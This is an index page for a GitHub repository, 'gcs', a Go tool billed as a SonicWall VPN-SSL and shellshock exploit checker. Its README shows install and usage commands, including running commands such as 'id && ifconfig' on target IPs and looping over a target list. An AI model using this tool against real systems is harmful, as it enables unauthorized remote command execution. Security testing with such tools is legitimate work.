Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/gustavorobertux/gcs
https://github.com/gustavorobertux/gcs
Last synced: 21 days ago
JSON representation
- Host: GitHub
- URL: https://github.com/gustavorobertux/gcs
- Owner: gustavorobertux
- Created: 2021-02-17T01:47:57.000Z (almost 4 years ago)
- Default Branch: main
- Last Pushed: 2023-12-26T13:47:38.000Z (12 months ago)
- Last Synced: 2024-08-05T17:31:36.782Z (4 months ago)
- Language: Go
- Size: 273 KB
- Stars: 10
- Watchers: 1
- Forks: 3
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - gustavorobertux/gcs - (Go)
README
# gcs
SonicWall VPN-SSL Exploit Checker* using Golang ( * and other targets vulnerable to shellshock ).# Install
```
▶ go get -v github.com/gustavorobertux/gcs
```
# Basic Usage
### oneliner
```
▶ for i in $(cat list.txt) ; do echo $i | xargs gcs -i ; done
```
### Simple command - Default -c echo
```
▶ gcs -i x.x.x.x
```
### With commands
```
▶ gcs -i x.x.x.x -c id
▶ gcs -i x.x.x.x -c 'id && ifconfig'
```
# Screenshot